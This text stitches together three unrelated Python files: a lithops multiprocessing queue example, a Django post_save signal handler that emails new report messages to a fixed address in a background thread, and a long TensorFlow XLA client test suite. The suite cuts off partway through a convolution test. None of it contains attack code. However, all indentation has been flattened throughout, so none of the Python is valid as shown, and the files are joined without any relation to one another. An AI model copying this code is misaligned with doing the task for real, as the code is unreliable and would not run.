from lithops.multiprocessing import Process, SimpleQueue, Queue
def f(q):
q.put([42, None, 'hello World'])
if __name__ == '__main__':
q = SimpleQueue()
# q = Queue()
p = Process(target=f, args=(q,))
p.start()
    print(q.get())  # prints "[42, None, 'hello World']"
p.join()
|
signals.py
|
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.auth import get_user_model
from sw.models import Message
from sw.task import send_verification_email
from threading import Thread
User = get_user_model()
@receiver(post_save, sender=Message, dispatch_uid='send_mail_to_user')
def send_mail_to_user(*args, **kwargs):
# print('I am working')
obj = kwargs.get("instance")
created = kwargs.get("created")
if created:
name = f"{obj.name}"
occupation = f"{obj.occupation}"
contact = f"{obj.phone}"
confidential = f"{obj.confidential}"
subject = f"{obj.subject}"
messages = f"{obj.messages}"
date = f"{obj.date}"
email = 'voluntaryreport@gmail.com'
background_job = Thread(target=send_verification_email, args=(name, occupation, contact, confidential, subject, messages, date, email))
print('Post is created')
background_job.start()
|
xla_client_test.py
|
# Lint as: python3
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import itertools
import threading
import unittest
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import custom_call_for_test
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
import portpicker
except ImportError:
portpicker = None
# pylint: enable=g-import-not-at-top
bfloat16 = xla_client.bfloat16
class ComputationTest(absltest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
return xla_client.execute_with_python_values(compiled_c, arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
    # [[4]]. We'd like to be stricter, so we assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-7,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol), c,
arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationPrinting(absltest.TestCase):
def ExampleComputation(self):
builder = xla_client.ComputationBuilder("acomputation")
p0 = builder.ParameterFromNumpy(np.float32(0))
p1 = builder.ParameterFromNumpy(np.zeros((4,), np.float32))
x = builder.Mul(p0, p1)
builder.Add(x, x)
return builder.Build()
def testComputationToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.GetHloText()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testComputationToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = computation.GetHloDotGraph()
self.assertTrue(hlo_dot_graph.startswith("digraph "))
def testHloModuleToHloText(self):
computation = self.ExampleComputation()
hlo_text = computation.computation.get_hlo_module().to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
def testHloModuleToHloGraph(self):
computation = self.ExampleComputation()
hlo_dot_graph = xla_client._xla.hlo_module_to_dot_graph(
computation.computation.get_hlo_module())
self.assertTrue(hlo_dot_graph.startswith("digraph "))
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = computation.Compile()
hlo_modules = executable.get_hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
class ComputationHashTest(absltest.TestCase):
def testHash(self):
builder0 = xla_client.ComputationBuilder("computation0")
p0 = builder0.ParameterFromNumpy(np.float32(0))
p1 = builder0.ParameterFromNumpy(np.zeros((4,), np.float32))
builder0.Mul(p0, p1)
computation0 = builder0.Build()
builder1 = xla_client.ComputationBuilder("computation1")
p0 = builder1.ParameterFromNumpy(np.float32(0))
p1 = builder1.ParameterFromNumpy(np.zeros((4,), np.float32))
builder1.Mul(p0, p1)
computation1 = builder1.Build()
self.assertEqual(computation0.Hash(), computation1.Hash())
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumS8(self):
c = self._NewComputation()
c.Add(c.Constant(np.int8(1)), c.Constant(np.int8(2)))
self._ExecuteAndCompareExact(c, expected=np.int8(3))
def testConstantScalarSumBF16(self):
c = self._NewComputation()
c.Add(c.Constant(bfloat16(1.11)), c.Constant(bfloat16(3.14)))
self._ExecuteAndCompareClose(c, expected=bfloat16(4.25))
def testConstantScalarSumF32(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF16(self):
c = self._NewComputation()
c.Mul(
c.Constant(np.array([2.5, 3.3, -1.2, 0.7], np.float16)),
c.Constant(np.array([-1.2, 2, -2, -3], np.float16)))
self._ExecuteAndCompareClose(
c, expected=np.array([-3, 6.6, 2.4, -2.1], np.float16), rtol=2e-3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])), c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(
c.Constant(NumpyArrayS32([-2])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(
c.Constant(NumpyArrayS32([-1])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
arg_buffers = [xla_client.Buffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)], expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().Compile()
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
device = xla_client.get_local_backend().devices()[0]
local_buffer = xla_client.Buffer.make_tuple((), device=device)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertEmpty(pieces)
def testDestructureTupleOneArrayElement(self):
device = xla_client.get_local_backend().devices()[0]
t = xla_client.Buffer.from_pyval(np.array([1, 2, 3, 4], dtype=np.int32))
local_buffer = xla_client.Buffer.make_tuple((t,), device)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
device = xla_client.get_local_backend().devices()[0]
t = (
xla_client.Buffer.from_pyval(
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32)),
xla_client.Buffer.from_pyval(np.array([2, 3, 4, 5], dtype=np.int32)),
)
local_buffer = xla_client.Buffer.make_tuple(t, device)
# Run the test twice to verify that the original tuple buffer remains valid
# even after destructuring.
for _ in range(2):
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
device = xla_client.get_local_backend().devices()[0]
t = xla_client.Buffer.make_tuple(
(xla_client.Buffer.from_pyval(NumpyArrayF32([1.0, 2.0])),
xla_client.Buffer.from_pyval(NumpyArrayS32([3, 4]))), device)
local_buffer = xla_client.Buffer.make_tuple(
(t, xla_client.Buffer.from_pyval(NumpyArrayS32([5]))), device)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertLen(got, 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testMakeTuple(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
b0 = xla_client.Buffer.from_pyval(t[0])
b1 = xla_client.Buffer.from_pyval(t[1])
device = xla_client.get_local_backend().local_devices()[0]
btup = xla_client.Buffer.make_tuple([b0, b1], device=device)
pieces = btup.destructure()
self.assertLen(pieces, 2)
array0, array1 = pieces
np.testing.assert_equal(
np.array([1, 2, 3, 4], dtype=np.float32), array0.to_py())
np.testing.assert_equal(
np.array([2, 3, 4, 5], dtype=np.int32), array1.to_py())
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.Buffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testTupleShape(self):
t = (
np.array([[1.0, 2.0, 3.0, 4.0]], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
b0 = xla_client.Buffer.from_pyval(t[0])
b1 = xla_client.Buffer.from_pyval(t[1])
device = xla_client.get_local_backend().local_devices()[0]
tuple_buffer = xla_client.Buffer.make_tuple([b0, b1], device=device)
tuple_shape = tuple_buffer.shape()
self.assertEqual(tuple_shape.leaf_count(), 2)
shapes = tuple_shape.tuple_shapes()
self.assertLen(shapes, 2)
shape1, shape2 = shapes
self.assertEqual(shape1.dimensions(), (1, 4))
self.assertEqual(shape2.dimensions(), (4,))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = xla_client.Buffer.from_pyval(arg0)
arg1_buffer = xla_client.Buffer.from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8)
for device in xla_client.get_local_backend().local_devices():
buf = xla_client.Buffer.from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
  single XLA ops. As few additional ops as possible are added around the op
  being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.PrimitiveType.PRED,
np.int32: xla_client.PrimitiveType.S32,
np.int64: xla_client.PrimitiveType.S64,
np.float32: xla_client.PrimitiveType.F32,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.PrimitiveType.S32,
np.float32: xla_client.PrimitiveType.F32,
}
xla_x64_types = {
np.int64: xla_client.PrimitiveType.S64,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testReplicaId(self):
c = self._NewComputation()
_ = c.ReplicaId()
self._ExecuteAndCompareExact(c, expected=0)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
c.DotGeneral(
c.Constant(lhs),
c.Constant(rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [1, 1], xla_client.PaddingType.SAME)
result = np.array([[[
[640., 700., 760., 300.],
[880., 940., 1000., 380.],
